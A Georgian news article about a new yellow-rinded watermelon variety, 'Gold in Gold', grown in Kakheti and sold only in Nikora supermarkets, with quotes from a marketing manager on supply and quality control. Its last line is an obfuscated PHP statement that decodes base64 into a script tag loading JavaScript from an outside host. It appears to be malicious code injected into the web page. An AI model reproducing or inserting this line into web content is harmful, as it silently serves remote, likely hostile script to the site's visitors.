celsiusi
ავერსი შნაიდერი

ქართულ ბაზარზე საზამთროს უცხო ჯიში - „ოქრო ოქროში“ გამოჩნდა. ყვითელი საზამთრო მწვანე გარეკანით უკვე უცხო არავისთვისაა, თუმცა ყვითელი საზამთრო ყვითელი გარსით ნამდვილად სიახლეა. საინფორმაციო სააგენტო „ბიზნესთაიმი“ ახალი პროდუქტით დაინტერესდა და კითხვებით «ნიკორას» ფრეში პროდუქტების მარკეტინგის მენეჯერს გიორგი ტყემალაძეს მიმართა, რადგან აღნიშნული პროდუქტი მხოლოდ «ნიკორას» ქსელში იყიდება.

 როგორც ჩვენთვის გახდა ცნობილი, ყვითელი საზამთრო „ოქრო ოქროში“ საქართველოში, კახეთში, კერძოდ, ლაგოდეხის რაიონში მოყავთ. საზამთროს ეს კონკრეტული ჯიში კორეაში, აზიის სათესლე კომპანიამ გამოიყვანა, თუმცა უნდა აღინიშნოს რომ ეს ჯიში არის იმ ყვითელი საზამთროს შთამომავალი, რომელიც პირველად გაშენდა აფრიკაში, საუკუნეების წინ. 

WhatsApp Image 2024 08 02 at 13.41.54 3eaa4ae0 

„ნიკორა“ სუპერმარკეტების ქსელი ორიენტირებულია სიახლეებზე და მსოფლიო ტენდენციებს მისდევს. ჩვენც დაუღალავად ვმუშაობთ ასორტიმენტის მრავალფეროვნებაზე, გაუმჯობესებასა და სიახლეებზე. ვცდილობთ ჩვენს მომხმარებელს მივცეთ შესაძლებლობა, რომ პირველმა გასინჯოს და გაიგოს მსოფლიო კვებითი სიახლეები. შესაბამისად, ჩვენს პარტნიორ ფერმერთან შეთანხმების შემდეგ დაითესა საზამთროს ეს ჯიში ლაგოდეხის რაიონში და ის მხოლოდ ჩვენს ქსელს ამარაგებს საზამთრო - „ოქრო ოქროში“ სახეობით. ვინაიდან ეს პირველი სეზონია და ჩვენთვის და ჩვენი ფერმერებისთვის ერთგვარი გამოწვევა იყო, მხოლოდ რამდენიმე ათეული ტონის მოსავალია დაგეგმილი, თუმცა, მომხმარებლის აქტიურობიდან გამომიდინარე მომავალ წელს უფრო დიდი რაოდენობის მოყვანას ვგეგმავთ. რაოდენობის სიმცირის გამო საზამთროს რეალიზაცია მხოლოდ თბილისის, „ნიკორა“ სუპერმარკეტის დიდი ფორმატის მაღაზიებშია ლიმიტირებულად დაგეგმილი - განაცხადა ტყემალაძემ "ბიზნესთაიმთან".

მისივე თქმით, მოთხოვნა საკმაოდ მაღალია, მოლოდინებს აჭარბებს, შესაბამისად ის ათეული ტონა რაც ამ წლისთვის ქონდათ გათვლილი არასაკმარისი იქნება, ამითომაც გეგმავენ მომავალი წლისთვის უფრო მეტი რაოდენობის ხელმისაწვდომობა უზრუნველყონ.

პროდუქტის თვისებები და სანდოობა

სხვა ჯიშის საზამთროებთან შედარებით ახასიათებს მაღალი შაქრიანიბა. ამასთანავე ეს საზამთრო A და C ვიტამინის შესანიშნავი წყაროა.

აღნიშნული პროდუქტი, ისევე როგორც სხვა მრავალი პროდუქცია ჩვენი ასორტიმენტიდან გადის ნიკორა ტრეიდის ხარისხის კონტროლს, თუმცა ასევე ჩვენი მომწოდებელი ფერმერიც ახორციელებს პროდუქციის ლაბორატორიულ კონტროლს აკრედიტებულ ლაბორატორიაში, რის შედეგებსაც ჩვენც გვიზიარებს.

ავტორი
მირანდა შურღაია
353
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");